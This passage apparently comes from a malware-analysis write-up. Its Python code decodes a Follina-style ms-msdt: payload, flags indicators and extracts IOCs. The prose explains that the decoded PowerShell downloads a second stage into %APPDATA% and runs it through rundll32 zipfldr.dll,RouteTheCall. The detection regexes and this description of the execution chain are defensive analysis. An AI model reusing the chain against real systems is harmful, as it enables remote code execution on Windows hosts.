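    return "".join(part.replace('\\"', '"') for part in JS_STRING.findall(js))


def decode_msdt_payload(msdt_url: str) -> str:
    """Return the PowerShell hidden in the IT_BrowseForFile parameter.

    Accepts the raw URL or the %-encoded form seen on msdt.exe's command line.
    """
    url = unquote(msdt_url)
    if not url.lower().startswith("ms-msdt:"):
        raise ValueError("not an ms-msdt: URL")
    blob = re.search(r"[A-Za-z0-9+/]{64,}", url)   # assumed: the only long base64 run
    if blob is None:
        raise ValueError("no base64 blob in URL")
    b64 = blob.group(0)
    b64 += "=" * (-len(b64) % 4)                   # tolerate stripped padding
    return base64.b64decode(b64).decode("utf-8")


def triage_msdt_url(msdt_url: str) -> dict:
    """Case-insensitive indicators of Follina-style abuse of the ms-msdt: handler.

    The sample randomises case (PCwdIAGnOSTic, -skiP fOrce), so match on lowercased text.
    """
    url = unquote(msdt_url)
    low = url.lower()
    return {
        "pcwdiagnostic": "pcwdiagnostic" in low,
        "skip_force": bool(re.search(r"-skip\s+force", low)),
        "subexpression_in_browseforfile": bool(re.search(r"it_browseforfile=[^\s]*\$\(", low)),
        "traversal_segments": len(re.findall(r"\.\./", url)),
        "fake_exe_suffix": bool(re.search(r"\.\./\.exe", low)),   # the "/../.EXE" tail
    }


def extract_iocs(ps: str) -> dict:
    """Pull network, file and process indicators out of the decoded PowerShell."""
    dropped = {}
    for path in re.findall(r"\$env:appdata\\[^\s'\"]+", ps, re.I):
        dropped.setdefault(path.lower(), path)       # same path appears in two casings
    return {
        "download_urls": re.findall(r"https?://[^\s'\"]+", ps),
        "dropped_paths": list(dropped.values()),
        "killed_processes": re.findall(r"stop-process\s+-force\s+-name\s+'([^']+)'", ps, re.I),
        "pinvoke_urldownloadtofile": "urldownloadtofile" in ps.lower(),
        "rundll32_zipfldr_routethecall": bool(
            re.search(r"rundll32(?:\.exe)?\s+zipfldr\.dll,routethecall", ps, re.I)),
    }


def report(js: str) -> dict:
    """End-to-end: script text -> msdt URL -> triage flags -> PowerShell -> IOCs."""
    url = join_js_fragments(js)
    ps = decode_msdt_payload(url)
    return {"msdt_url": url, "triage": triage_msdt_url(url), "powershell": ps, "iocs": extract_iocs(ps)}


if __name__ == "__main__":
    import json
    print(json.dumps(report(SAMPLE_JS), indent=2))
```

Running the file prints the reassembled URL, the decoded PowerShell and the indicators as JSON. The decoded script stops msdt, P/Invokes `URLDownloadToFile` from urlmon.dll to fetch a second stage into `%APPDATA%`, sleeps, runs it through `rundll32 zipfldr.dll,RouteTheCall`, and finally kills `sdiagnhost`, so the indicators worth blocking or hunting for are the download host, the `%APPDATA%` drop path and the rundll32/zipfldr proxy execution. Because `decode_msdt_payload` calls `unquote` first, the same function can be fed the `%20`/`%22`-encoded argument from the msdt.exe command line (PID 5472) in the process tree.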